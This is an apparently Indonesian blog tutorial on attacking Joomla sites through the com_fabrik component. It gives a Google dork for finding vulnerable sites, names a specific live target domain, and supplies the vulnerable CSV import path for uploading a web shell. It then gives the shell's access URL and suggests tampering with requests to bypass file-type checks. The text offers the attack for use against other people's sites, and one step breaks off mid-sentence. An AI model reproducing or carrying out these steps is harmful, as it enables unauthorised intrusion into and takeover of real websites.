disini saya jelaskan sedikit ya tentang exploit. Saya sih
belum tau arti lengkapnya, tapi secara singkatnya itu exploit dapat
diartikan sebagai sebuah kode yang menyerang keamanan
Sekarang
kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk
mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.
1. Copas dork ini ke google [dork bisa dikembangkan]
- inurl:index.php?option=com_fabrik
2. Ceritanya kita sudah mendapat si target
- http://ar.librodar.com.ar/index.php?option=com_fabrik
3. Maka pastekan Vulnerable path nya di depan Url, Vulnerable path nya adalah ini :
- index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Maka akan jadi seperti ini
- http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
5. Langsung saja upload file, gak perlu dicentang kok ;) . Oh ya filenya bisa bertipe
6. Sudah ? nah sekarang kita akses shellnya di
- http://localhost.com/media/shell.php
Kalo tipe .php gabisa ya terpaksa dengan tamper data :D
Live Target : http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sekian tutorial nya semoga bermanfaat kalau ada salah salah kata mohon dimaafkan